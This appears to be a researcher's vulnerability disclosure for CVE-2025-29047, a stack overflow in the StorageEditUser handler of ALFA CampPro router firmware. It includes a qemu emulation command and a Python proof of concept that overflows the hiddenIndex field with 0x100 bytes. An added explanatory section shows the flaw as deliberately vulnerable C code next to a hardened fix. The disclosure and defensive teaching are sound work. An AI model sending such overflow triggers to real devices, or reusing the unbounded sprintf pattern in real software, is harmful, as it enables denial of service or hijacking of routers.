@xyqer1
Last active April 17, 2025 09:02

ALFA WiFi CampPro-StorageEditUser-hiddenIndex

Vulnerability Details

  • Affected Firmware: ALFA_CAMPRO-co-2.29
  • CVE-ID: CVE-2025-29047
  • Root Cause: By analyzing the goahead file in the bin directory, I found that the function StorageEditUser contains a stack overflow vulnerability.
  • Impact: Remote unauthenticated attackers can hijack the program's control flow.

Vendor Information

During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the ALFA WiFi CampPro router.

By analyzing the goahead file in the bin directory, I found that the function StorageEditUser contains a stack overflow vulnerability.

The stack overflow can be triggered by the hiddenIndex key value, which leads to a sprintf stack overflow.

[screenshot]

[screenshot]

How to simulate the router

Use the following command to emulate the goahead binary with qemu-mipsel-static.

sudo qemu-mipsel-static -L ./ ./bin/goahead

The content of the poc.py file is as follows:

import requests

# Endpoint of the vulnerable handler on the emulated router
url = "http://127.0.0.1/goform/StorageEditUser"

# 0x100 bytes of "a" in hiddenIndex, well past the 0x48-byte stack frame
data = {
    "hiddenIndex": "a" * 0x100
}

res = requests.post(url, data=data)
print(res.text)

Attack result

[screenshot]

One can see that the function's stack frame is 0x48 bytes.

[screenshot]

After execution, it overflows to 0x128. If you want to overflow more, you can modify the hiddenIndex key value in the code.
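To make the root cause concrete from the fixing side, here is an added example (not code from the gist and not the goahead binary's code) that reconstructs the bug class as hypothetical C: the `hiddenIndex` request parameter formatted with `sprintf()` into a fixed stack buffer, beside a bounded and validated rewrite. The buffer size (64 bytes), the format string, the digits-only policy and the function names are all assumptions; the gist only reports a 0x48-byte stack frame and a 0x100-byte trigger.

```c
/*
 * Added example, not code from the gist or from the goahead binary.
 * It reconstructs the bug class the advisory describes as hypothetical code:
 * a request parameter ("hiddenIndex") formatted with sprintf() into a fixed
 * stack buffer, beside a bounded, validated rewrite. Buffer size, format
 * string and length policy are assumptions; the gist only reports a
 * 0x48-byte stack frame and a 0x100-byte trigger.
 */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define INDEX_BUF_SIZE 64  /* assumed size of the local buffer (constructed) */
#define MAX_INDEX_LEN   8  /* assumed policy: a user index is a short number */

/* Vulnerable pattern: sprintf() copies the whole attacker-controlled string
 * with no bound, so a value longer than the buffer overwrites the saved
 * return address. Shown for contrast only; never call it with untrusted input. */
void storage_edit_user_vulnerable(const char *hiddenIndex)
{
    char index_buf[INDEX_BUF_SIZE];
    sprintf(index_buf, "index=%s", hiddenIndex);   /* unbounded write */
    printf("%s\n", index_buf);
}

/* Hardened form: bound the length, allow-list the content, then format with
 * snprintf() using the destination size. Returns 0 on success, -1 if the
 * value is rejected; on -1 nothing is written to out. */
int storage_edit_user_hardened(const char *hiddenIndex, char *out, size_t out_len)
{
    if (hiddenIndex == NULL || out == NULL || out_len == 0)
        return -1;

    /* Count at most MAX_INDEX_LEN + 1 bytes: an oversized value is rejected
       without ever being copied anywhere. */
    size_t len = 0;
    while (len <= MAX_INDEX_LEN && hiddenIndex[len] != '\0')
        len++;
    if (len == 0 || len > MAX_INDEX_LEN)
        return -1;

    /* Allow-list: an index is decimal digits only. */
    for (size_t i = 0; i < len; i++) {
        if (hiddenIndex[i] < '0' || hiddenIndex[i] > '9')
            return -1;
    }

    /* Bounded formatting: snprintf() truncates instead of overflowing, and a
       return value >= out_len means the output did not fit. */
    int n = snprintf(out, out_len, "index=%s", hiddenIndex);
    if (n < 0 || (size_t)n >= out_len)
        return -1;
    return 0;
}

/* Convenience wrapper: formats into a static buffer and returns it, or NULL
   when the value is rejected. */
const char *format_index(const char *hiddenIndex)
{
    static char out[INDEX_BUF_SIZE];
    if (storage_edit_user_hardened(hiddenIndex, out, sizeof out) != 0)
        return NULL;
    return out;
}

/* Feeds the hardened handler a value shaped like the gist's PoC
   ("a" * 0x100, constructed locally) and returns its verdict. */
int long_value_verdict(void)
{
    char value[0x100 + 1];
    memset(value, 'a', 0x100);
    value[0x100] = '\0';
    char out[INDEX_BUF_SIZE];
    return storage_edit_user_hardened(value, out, sizeof out);
}

int main(void)
{
    printf("\"3\"         -> %s\n", format_index("3") ? format_index("3") : "rejected");
    printf("\"3x\"        -> %s\n", format_index("3x") ? "ok" : "rejected");
    printf("0x100 x 'a' -> %s\n", long_value_verdict() == 0 ? "ok" : "rejected");
    return 0;
}
```

The length check runs before any copy, so the 0x100-byte value from the PoC is refused without touching the stack buffer; the `snprintf()` bound is a second, independent line of defence in case the policy check is ever loosened. When auditing similar CGI handlers, the thing to grep for is exactly this shape: a form value reaching `sprintf()`, `strcpy()` or `strcat()` with a fixed-size local as the destination.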
